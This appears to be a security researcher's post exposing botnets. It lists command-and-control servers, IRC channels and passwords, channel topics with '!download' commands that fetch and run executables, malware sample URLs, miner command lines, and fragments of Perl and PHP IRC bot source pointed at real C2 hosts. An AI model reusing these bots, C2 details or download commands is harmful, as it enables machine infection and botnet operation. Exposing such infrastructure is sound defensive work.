Resolved thebankslife.no-ip.biz to 72.20.28.232
Server: thebankslife.no-ip.biz
Port: 6667
Channel      Users  Topic
#sexlyfe     2      [+nt]
#Syncrude    78     [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5
#bankslife   35     [+nt] .gtfo
Channel: #Syncrude
Now talking on #Syncrude
Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5
Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013)
Bitcoin mining info: macromedia.exe" -a scrypt -o...
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5
Server: bitcoinglobalbanking.com
Gate file: /b/order.php
Alternate domain: bitcointradingdepot.com
This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised.
Hosting infos: http://whois.domaintools.com/82.192.92.5
Related md5s (search on malwr.com to download the samples):
Beta bot bbfdbd53810751401b720641687a6116
EDIT: It finally started bitcoin mining
Mining infos: macromedia.exe" -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.cr...
EpicBot v1.0 by h22turbo (hosted in United Kingdom Derby Webfusion Internet Solutions)
Perl bot found by Yewnix
my @adms=("Darkone");
my @canais=("#dark7887");
my @nickname = ("DARK");
my $nick = $nickname[rand scalar @nickname];
my $ircname ='dark';
chop (my $realname = `uname -a`);
$servidor='dark86.no-ip.org' unless $servidor;
my $porta='7000';
Source
EpicBot hosting infos: http://whois.domaintools.com/91.109.4.212
Autoit Bot
Found this sample and decompiled it, so have fun with the source, which is partially encrypted.
Here is the sample: hxxp://93.57.18.211/bot.exe
And here is the source, decompiled and partially encrypted with BitXOR. Password for the link is: exposedbotnets
voscomptesenligne.eu (Andromeda Bot hosted in Netherlands International Widespread Services Limited)
Sample found by ALiSs
URLs: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php
Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack hxxp://www.curboc.com /joomla/r.pack
hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902
Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/
Same Poem here: hxxp://www.curboc.com
Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe
miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro)
Hosting infos: http://whois.domaintools.com/91.223.82.179
178.86.23.225 (ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls
Server: 178.86.23.225:1875
Server Password:
Username: uiswnri
Nickname: n{DE|XPa}uiswnri
Channel: #moon (Password: 4m3r1k)
Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0
Inactive domain: harlan10.com
Hosting infos: http://whois.domaintools.com/178.86.23.225
smokelessbooter.tk (Betabot http botnet hosted by ecatel.net)
Resolved smokelessbooter.tk to 94.102.51.123
Server: smokelessbooter.tk
Gate file: /bronk/order.php
Alternate domains: watchonlinecams.com, ssh-products.com, fudfiles.com, theprofitnet.com, 1337hackers.com, cash-networks.com
We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well: ...
bigtoys.pw (Betabot http botnet hosted by namecheap.com)
Resolved bigtoys.pw to 198.187.28.72
Server: bigtoys.pw
Gate file: /b/order.php
Alternative domain: smalltoys.pw
I wonder who this could belong to?
Name Server: NS2.HOSTING-MARVID.ME
Name Server: NS1.HOSTING-MARVID.ME
An idiot, obviously
Related md5s (search on malwr.com to download the samples):
Betabot: 2662af32e5d58d471bd16dc3202db284
Hosting infos: http://whois.domaintools.com/198.187.28.72
us.eclipsemc.com (BitCoin Miner hosted in United States Independence Host Metro)
Sample: hxxp://darknode.net/Mining.exe
coin-miner.exe" -a sha256 -o hxxp://brucegregory_bot:x@us.eclipsemc.com:8337 -T 83 -l yes -t 1
Hosting infos: http://whois.domaintools.com/67.14.164.114
37.221.170.195 (PHP Bots hosted in Germany Frankfurt Am Main Voxility S.r.l.)
Found by Yewnix
<?
set_time_limit(0);
error_reporting(0);
class Anxiety {
    var $config = array(
        "server"=>"37.221.170.195", // Server IP Address
        "port"=>443,
        "pass"=>"", // Server Password
        "prefix"=>"[r00t]-",
        "maxrand"=>3,
        "chan"=>"#exploit", // Channel
        "key"=>"lolmoney", // Channel Key
        "modes"=>"+p",
        "password"=>"lolmoney", // Bot Password
        "trigger"=>".",
        "hostauth"=>"anxiety.gov" // * For Any Hostname
        //Leave all of this shit down here alone, unless you know what...